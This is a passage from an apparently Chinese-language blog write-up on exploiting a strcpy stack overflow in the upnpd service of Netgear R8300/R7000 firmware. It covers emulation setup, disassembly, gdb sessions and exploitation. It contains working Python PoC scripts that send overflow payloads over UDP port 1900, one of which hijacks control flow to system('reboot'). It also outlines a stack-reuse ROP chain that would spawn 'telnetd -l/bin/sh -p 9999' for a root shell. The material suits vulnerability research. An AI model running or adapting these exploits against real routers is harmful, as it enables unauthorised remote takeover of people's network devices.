< ul >
< li > 配置tmp/nvram.ini信息< / li >
< / ul >
< p > 接下来要做的就是根据上面的日志补全配置信息,也可以参考< a href = "https://github.com/zcutlip/nvram-faker/blob/master/nvram.ini。至于为什么这么设置, 可以查看对应的汇编代码逻辑( 配置的有问题的话很容易触发段错误) 。" target = "_blank" rel = "noopener" > https://github.com/zcutlip/nvram-faker/blob/master/nvram.ini。至于为什么这么设置, 可以查看对应的汇编代码逻辑( 配置的有问题的话很容易触发段错误) 。< / a > < / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > upnpd_debug_level=9< / span > < br > < span class = "line" > lan_ipaddr=192.168.2.2< / span > < br > < span class = "line" > hwver=R8500< / span > < br > < span class = "line" > friendly_name=R8300< / span > < br > < span class = "line" > upnp_enable=1< / span > < br > < span class = "line" > upnp_turn_on=1< / span > < br > < span class = "line" > upnp_advert_period=30< / span > < br > < span class = "line" > upnp_advert_ttl=4< / span > < br > < span class = "line" > upnp_portmap_entry=1< / span > < br > < span class = "line" > upnp_duration=3600< / span > < br > < span class = "line" > upnp_DHCPServerConfigurable=1< / span > < br > < span class = "line" > wps_is_upnp=0< / span > < br > < span class = "line" > upnp_sa_uuid=00000000000000000000< / span > < br > < span class = "line" > lan_hwaddr=AA:BB:CC:DD:EE:FF< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< ul >
< li > 运行过程< / li >
< / ul >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "meta" > #< / span > ./usr/sbin/upnpd< / span > < br > < span class = "line" > < span class = "meta" > #< / span > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > /dev/nvram: No such file or directory< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "meta" > #< / span > LD_PRELOAD="./nvram.so" ./usr/sbin/upnpd< / span > < br > < span class = "line" > < span class = "meta" > #< / span > ./usr/sbin/upnpd: can't resolve symbol 'dlsym'< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "meta" > #< / span > LD_PRELOAD="./nvram.so ./lib/libdl.so.0" ./usr/sbin/upnpd< / span > < br > < span class = "line" > < span class = "meta" > #< / span > [0x00026460] fopen('/var/run/upnpd.pid', 'wb+') = 0x00b19008< / span > < br > < span class = "line" > [0x0002648c] custom_nvram initialised< / span > < br > < span class = "line" > [0x76eb7cb8] *fopen**('/tmp/nvram.ini', 'r') = 0x00b19008*< / span > < br > < span class = "line" > [nvram 0] upnpd_debug_level = 9< / span > < br > < span class = "line" > [nvram 1] lan_ipaddr = 192.168.2.2< / span > < br > < span class = "line" > [nvram 2] hwver = R8500< / span > < br > < span class = "line" > [nvram 3] friendly_name = R8300< / span > < br > < span class = "line" > [nvram 4] upnp_enable = 1< / span > < br > < span class = "line" > [nvram 5] upnp_turn_on = 1< / span > < br > < span class = "line" > [nvram 6] upnp_advert_period = 30< / span > < br > < span class = "line" > [nvram 7] upnp_advert_ttl = 4< / span > < br > < span class = "line" > [nvram 8] upnp_portmap_entry = 1< / span > < br > < span class = "line" > [nvram 9] upnp_duration = 3600< / span > < br > < span class = "line" > [nvram 10] upnp_DHCPServerConfigurable = 1< / span > < br > < span class = "line" > [nvram 11] wps_is_upnp = 0< / span > < br > < span class = "line" > [nvram 12] upnp_sa_uuid = 00000000000000000000< / span > < br > < span class = "line" > [nvram 13] lan_hwaddr = AA:BB:CC:DD:EE:FF< / span > < br > < span class = "line" > [nvram 14] lan_hwaddr =< / span > < br > < span class = "line" > Read 15 entries from /tmp/nvram.ini< / span > < br > < span class = "line" > acosNvramConfig_get('upnpd_debug_level') = '9'< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< h2 id = "0x03-静态分析" > < a href = "#0x03-静态分析" class = "headerlink" title = "0x03 静态分析" > < / a > 0x03 静态分析< / h2 > < p > 该漏洞的原理是使用strcpy函数不当, 拷贝过长字符导致缓冲区溢出, 那么如何到达溢出位置。< br > 首先upnpd服务在< code > sub_1D020()< / code > 中使用< code > recvfrom()< / code > 从套接字接收UDP数据包, 并捕获数据发送源的地址。从函数定义可知, upnpd接收了长度为0x1FFFF大小的数据到缓冲区v54< / p >
< blockquote >
< p > < strong > recvfrom< / strong > recvfrom函数(经socket接收数据):< / p >
< / blockquote >
< blockquote >
< p > 函数原型:int recvfrom(SOCKET s,void < strong > *buf< / strong > ,int < strong > len< / strong > ,unsigned int flags, struct sockaddr < em > from,int < / em > fromlen);< / p >
< / blockquote >
< blockquote >
< p > 相关函数 recv, recvmsg, send, sendto, socket< / p >
< / blockquote >
< blockquote >
< p > 函数说明:< a href = "https://baike.baidu.com/item/recv%28%29" target = "_blank" rel = "noopener" > recv()< / a > 用来接收远程主机经指定的socket传来的数据,并把数据传到由参数buf指向的内存空间,参数len为可接收数据的最大长度.参数flags一般设0,其他数值定义参考recv().参数from用来指定欲传送的< a href = "https://baike.baidu.com/item/%E7%BD%91%E7%BB%9C%E5%9C%B0%E5%9D%80" target = "_blank" rel = "noopener" > 网络地址< / a > ,结构sockaddr请参考bind()函数.参数fromlen为sockaddr的结构长度.< / p >
< / blockquote >
< p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083882/netgear/image_29.png" alt > < br > 在 < code > sub_25E04()< / code > 中调用 < code > strcpy()< / code > 将以上数据拷贝到大小为 < code > 0x634 - 0x58 = 0x5dc< / code > 的 buffer。如果超过缓冲区大小, 数据就会覆盖栈底部分甚至返回地址。< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083972/netgear/image_30.png" alt > < / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > +-----------------+< / span > < br > < span class = "line" > | retaddr |< / span > < br > < span class = "line" > +-----------------+< / span > < br > < span class = "line" > | saved ebp |< / span > < br > < span class = "line" > ebp---> +-----------------+< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > s,ebp-0x58--> +-----------------+< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > | buffer |< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > | |< / span > < br > < span class = "line" > v40,ebp-0x634--> +-----------------+< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< h2 id = "0x04-动态调试" > < a href = "#0x04-动态调试" class = "headerlink" title = "0x04 动态调试" > < / a > 0x04 动态调试< / h2 > < p > 使用gdbserver调试目标程序< a href = "https://res.cloudinary.com/dozyfkbg3/raw/upload/v1568965448/gdbserver" target = "_blank" rel = "noopener" > https://res.cloudinary.com/dozyfkbg3/raw/upload/v1568965448/gdbserver< / a > < / p >
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > # ps|grep upnp< / span > < br > < span class = "line" > 2714 0 3324 S ./usr/sbin/upnpd< / span > < br > < span class = "line" > 2788 0 1296 S grep upnp< / span > < br > < span class = "line" > # ./gdbserver 127.0.0.1:12345 --attach 2714< / span > < br > < span class = "line" > Attached; pid = 2714< / span > < br > < span class = "line" > Listening on port 12345< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > 工作机上使用跨平台试gdb-multiarch< br > < code > gdb-multiarch -x dbgscript< / code > < br > dbgscript 内容< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > set architecture arm< / span > < br > < span class = "line" > gef-remote -q 192.168.2.1:12345< / span > < br > < span class = "line" > file usr/sbin/upnpd< / span > < br > < span class = "line" > set remote exec-file /usr/sbin/upnpd< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< p > 直接构造溢出字符, 程序不会正常返回, 因为栈上存在一个v40的指针v51, 需要覆盖为有效地址才能正确返回。< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083781/netgear/image_23.png" alt > < / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight python" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "comment" > #!/usr/bin/python3< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "keyword" > import< / span > socket< / span > < br > < span class = "line" > < span class = "keyword" > import< / span > struct< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > p32 = < span class = "keyword" > lambda< / span > x: struct.pack(< span class = "string" > "< L"< / span > , x)< / span > < br > < span class = "line" > s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)< / span > < br > < span class = "line" > payload = (< / span > < br > < span class = "line" > < span class = "number" > 0x634< / span > * < span class = "string" > b'a'< / span > +< / span > < br > < span class = "line" > p32(< span class = "number" > 0x43434343< / span > )< / span > < br > < span class = "line" > )< / span > < br > < span class = "line" > print(payload)< / span > < br > < span class = "line" > s.connect((< span class = "string" > '192.168.2.2'< / span > , < span class = "number" > 1900< / span > ))< / span > < br > < span class = "line" > s.send(payload)< / span > < br > < span class = "line" > s.close()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083780/netgear/image_24.png" alt > < br > < figure class = "highlight python" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "comment" > #!/usr/bin/python3< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "keyword" > import< / span > socket< / span > < br > < span class = "line" > < span class = "keyword" > import< / span > struct< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > p32 = < span class = "keyword" > lambda< / span > x: struct.pack(< span class = "string" > "< L"< / span > , x)< / span > < br > < span class = "line" > s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)< / span > < br > < span class = "line" > payload = (< / span > < br > < span class = "line" > < span class = "number" > 0x604< / span > * < span class = "string" > b'a'< / span > + < span class = "comment" > # dummy< / span > < / span > < br > < span class = "line" > p32(< span class = "number" > 0x7e2da53c< / span > ) + < span class = "comment" > # v51< / span > < / span > < br > < span class = "line" > (< span class = "number" > 0x634< / span > - < span class = "number" > 0x604< / span > - < span class = "number" > 8< / span > ) * < span class = "string" > b'a'< / span > + < span class = "comment" > # dummy< / span > < / span > < br > < span class = "line" > p32(< span class = "number" > 0x43434343< / span > ) < span class = "comment" > # LR< / span > < / span > < br > < span class = "line" > )< / span > < br > < span class = "line" > s.connect((< span class = "string" > '192.168.2.2'< / span > , < span class = "number" > 1900< / span > ))< / span > < br > < span class = "line" > s.send(payload)< / span > < br > < span class = "line" > s.close()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
2021-01-08 05:39:16 +00:00
< p > 可以看到, 我们向返回地址发送的数据为0x43434343, 但最后PC寄存器的值为0x43434342, 最后一个bit变为0, 这是为什么? < a href = "https://blog.3or.de/arm-exploitation-defeating-dep-executing-mprotect.html" target = "_blank" rel = "noopener" > https://blog.3or.de/arm-exploitation-defeating-dep-executing-mprotect.html< / a > < / p >
< ul >
< li > 首先溢出覆盖了非叶函数的返回地址。一旦这个函数执行它的结束语来恢复保存的值, 保存的LR就被弹出到PC中返回给调用者。< / li >
< li > 其次关于最低有效位的一个注意事项: BX指令将加载到PC的地址的LSB复制到CPSR寄存器的T状态位, CPSR寄存器在ARM和Thumb模式之间切换: ARM( LSB=0) /Thumb( LSB=1) 。< ul >
< li > 我们可以看到R7300是运行在THUMB状态< / li >
< li > 当处理器处于ARM状态时, 每条ARM指令为4个字节, 所以PC寄存器的值为当前指令地址 + 8字节< / li >
< li > 当处理器处于Thumb状态时, 每条Thumb指令为2字节, 所以PC寄存器的值为当前指令地址 + 4字节< / li >
< / ul >
< / li >
< li > 因此保存的LR( 用0x43434343覆盖) 被弹出到PC中, 然后弹出地址的LSB被写入CPSR寄存器T位( 位5) , 最后PC本身的LSB被设置为0, 从而产生0x43434342。< / li >
< / ul >
< p > 最后检查程序的缓解措施。程序本身开启了NX, 之前用过R7000的真机, 设备开了ASLR< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083780/netgear/image_25.png" alt > < br > 在堆栈恢复前下一个断点, 观察控制流转移情况, 将PC指针控制为重启指令。通过 hook 的日志可以看到, ROP 利用链按照预期工作( 由于模拟环境的问题, reboot 命令运行段错误了…)< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > gef➤ b *0x00025F40< / span > < br > < span class = "line" > Breakpoint 1 at 0x25f40< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > .text:00025F40 ADD SP, SP, #0x234< / span > < br > < span class = "line" > .text:00025F44 ADD SP, SP, #0x400< / span > < br > < span class = "line" > .text:00025F48 LDMFD SP!, { R4-R11,PC} < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > **.****text****:****0003E9DC** **** LDR R0, =aReboot_0 ; "reboot"< / span > < br > < span class = "line" > .text:0003E9E0 BL system< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > **payload如下: **< / span > < br > < span class = "line" > payload = (< / span > < br > < span class = "line" > 0x604 * b'a' + # dummy< / span > < br > < span class = "line" > p32(0x76d9d450) + # v41< / span > < br > < span class = "line" > (0x634 - 0x604 - 8) * b'a' + # dummy< / span > < br > < span class = "line" > p32(0x0003E9DC) # system(reboot)< / span > < br > < span class = "line" > )< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > **固件模拟日志:**< / span > < br > < span class = "line" > ssdp_http_method_check(203):< / span > < br > < span class = "line" > ssdp_http_method_check(231):Http message error< / span > < br > < span class = "line" > Detaching from process 3477< / span > < br > < span class = "line" > rmmod: dhd.ko: No such file or directory< / span > < br > < span class = "line" > **reboot: rmmod dhd failed: No such file or directory**< / span > < br > < span class = "line" > **[0x0003e9e4] system('reboot') = 0**< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< p > 综合目前的情况:< / p >
< ol >
< li > 目前可以控制< code > R4 - R11< / code > 以及 < code > PC(R15)< / code > 寄存器< / li >
< li > 开了 NX 不能用在栈上布置< code > shellcode< / code > 。< / li >
< li > 有 ASLR, 不能泄漏地址, 不能使用各种 LIB 库中的符号和 < code > gadget< / code > 。< / li >
< li > < code > strcpy()< / code > 函数导致的溢出, payload 中不能包含 < code > \x00< / code > 字符。< / li >
< / ol >
< h2 id = "0x05-漏洞利用" > < a href = "#0x05-漏洞利用" class = "headerlink" title = "0x05 漏洞利用" > < / a > 0x05 漏洞利用< / h2 > < p > 路由器已启用ASLR缓解功能, 我们可以使用ROP攻击绕过该功能。但是, 我们通过使用对NULL字节敏感的< strong > strcpy< / strong > 来执行复制调用, 这反过来又会阻止我们使用ROP攻击。因此, 要利用包含NULL字节的地址, 我们将需要使用堆栈重用攻击。即想办法提前将 ROP payload 注入目标内存。(< code > stack reuse< / code > ) < br > 注意到recvfrom函数在接收 socket 数据时 buffer 未初始化, 利用内存未初始化问题, 我们可以向sub_1D020的堆栈中布置gadgets。构造如下 PoC, 每个 payload 前添加 < code > \x00< / code > 防止程序崩溃( strcpy遇到\x00截断, 不会拷贝后面部分) 。< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight python" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "comment" > #!/usr/bin/python3< / span > < / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "keyword" > import< / span > socket< / span > < br > < span class = "line" > < span class = "keyword" > import< / span > struct< / span > < br > < span class = "line" > s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)< / span > < br > < span class = "line" > s.connect((< span class = "string" > '192.168.2.2'< / span > , < span class = "number" > 1900< / span > ))< / span > < br > < span class = "line" > s.send(< span class = "string" > b'\x00'< / span > + < span class = "string" > b'A'< / span > * < span class = "number" > 0x1ff0< / span > )< / span > < br > < span class = "line" > s.send(< span class = "string" > b'\x00'< / span > + < span class = "string" > b'B'< / span > * < span class = "number" > 0x633< / span > )< / span > < br > < span class = "line" > s.close()< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< p > 在strcpy下断点调试, 并检查栈区内存< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > gef➤ info b< / span > < br > < span class = "line" > Num Type Disp Enb Address What< / span > < br > < span class = "line" > 1 breakpoint keep y 0x76dd6e48 < recvfrom+4> < / span > < br > < span class = "line" > 2 breakpoint keep y 0x76dc350c < strcpy+4> < / span > < br > < span class = "line" > 4 breakpoint keep y 0x00025e70< / span > < br > < span class = "line" > 5 breakpoint keep y 0x00025e74< / span > < br > < span class = "line" > gef➤ search-pattern BBBB< / span > < br > < span class = "line" > [+] Searching 'BBBB' in memory< / span > < br > < span class = "line" > [+] In '/lib/libc.so.0'(0x76d85000-0x76dea000), permission=r-x< / span > < br > < span class = "line" > 0x76de17e4 - 0x76de17e8 → "BBBB[...]"< / span > < br > < span class = "line" > 0x76de1ecc - 0x76de1edb → "BBBBBBBBCCCCCCC"< / span > < br > < span class = "line" > 0x76de1ed0 - 0x76de1edb → "BBBBCCCCCCC"< / span > < br > < span class = "line" > [+] In '[stack]'(0x7eb36000-0x7eb6f000), permission=rw-< / span > < br > < span class = "line" > **0x7eb6cc75** - 0x7eb6ccac → "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]"< / span > < br > < span class = "line" > 0x7eb6cc79 - 0x7eb6ccb0 → "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]"< / span > < br > < span class = "line" > 0x7eb6cc7d - 0x7eb6ccb4 → "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]"< / span > < br > < span class = "line" > 0x7eb6cc81 - 0x7eb6ccb8 → "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]"< / span > < br > < span class = "line" > 0x7eb6cc85 - 0x7eb6ccbc → "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB[...]"< / span > < br > < span class = "line" > gef➤ x/s 0x7eb6cc75< / span > < br > < span class = "line" > 0x7eb6cc75: 'B' < repeats 1587 times> < / span > < br > < span class = "line" > gef➤ x/s 0x7eb6cc75+1588< / span > < br > < span class = "line" > 0x7eb6d2a9: 'A' < repeats 6588 times> < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2021-01-08 05:39:16 +00:00
< p > 此时程序上下文为< / p >
2021-04-11 06:53:08 +00:00
< figure class = "highlight shell" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < span class = "line" > 40< / span > < br > < span class = "line" > 41< / span > < br > < span class = "line" > 42< / span > < br > < span class = "line" > 43< / span > < br > < span class = "line" > 44< / span > < br > < span class = "line" > 45< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > gef➤ context< / span > < br > < span class = "line" > [ Legend: Modified register | Code | Heap | Stack | String ]< / span > < br > < span class = "line" > ───────────────────────────────────────────────────────────────────────────────────────────── registers ────< / span > < br > < span class = "line" > < span class = "meta" > $< / span > r0 : 0x7eb6c5fc → 0x00000000< / span > < br > < span class = "line" > **$r1 : 0x7eb6cc74** → 0x42424200< / span > < br > < span class = "line" > < span class = "meta" > $< / span > r2 : 0x1d < / span > < br > < span class = "line" > < span class = "meta" > $< / span > r3 : 0x7eb6c5fc → 0x00000000< / span > < br > < span class = "line" > **$r4 : 0x7eb6cc74** → 0x42424200< / span > < br > < span class = "line" > < span class = "meta" > $< / span > r5 : 0x0000cf02 → blx 0x10c6586< / span > < br > < span class = "line" > < span class = "meta" > $< / span > r6 : 0x7eb6ecf4 → "192.168.2.1"< / span > < br > < span class = "line" > < span class = "meta" > $< / span > r7 : 0x7eb6cc00 → 0x7eb6c5fc → 0x00000000< / span > < br > < span class = "line" > < span class = "meta" > $< / span > r8 : 0x7eb6cc04 → 0x76f10020 → 0x00000000< / span > < br > < span class = "line" > < span class = "meta" > $< / span > r9 : 0x3eaf < / span > < br > < span class = "line" > < span class = "meta" > $< / span > r10 : 0x1 < / span > < br > < span class = "line" > < span class = "meta" > $< / span > r11 : 0x000c4584 → 0x00000005< / span > < br > < span class = "line" > < span class = "meta" > $< / span > r12 : 0x00055450 → 0x76dc3508 → < strcpy+0> mov r3, r0< / span > < br > < span class = "line" > < span class = "meta" > $< / span > sp : 0x7eb6c5d8 → "nnection:1"< / span > < br > < span class = "line" > < span class = "meta" > $< / span > lr : 0x00025e74 → mov r0, r7< / span > < br > < span class = "line" > < span class = "meta" > $< / span > pc : 0x76dc350c → < strcpy+4> ldrb r2, [r1], #1< / span > < br > < span class = "line" > < span class = "meta" > $< / span > cpsr: [NEGATIVE zero carry overflow interrupt fast thumb]< / span > < br > < span class = "line" > ───────────────────────────────────────────────────────────────────────────────────────────────── stack ────< / span > < br > < span class = "line" > 0x7eb6c5d8│+0x0000: "nnection:1" ← $sp< / span > < br > < span class = "line" > 0x7eb6c5dc│+0x0004: "tion:1"< / span > < br > < span class = "line" > 0x7eb6c5e0│+0x0008: 0x0000313a (":1
2021-01-08 05:39:16 +00:00
< p > 由于接收 socket 数据的 buffer 未初始化,在劫持 PC 前我们可以往目标内存注入 6500 多字节的数据。 这么大的空间,也足以给 ROP 的 payload 一片容身之地。< / p >
< p > 使用 < code > strcpy< / code > 调用在 bss 上拼接出命令字符串 < code > telnetd\x20-l/bin/sh\x20-p\x209999\x20& \x20\x00< / code > ,并调整 R0 指向这段内存,然后跳转 < code > system< / code > 执行即可。< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1610083780/netgear/image_26.png" alt > < / p >
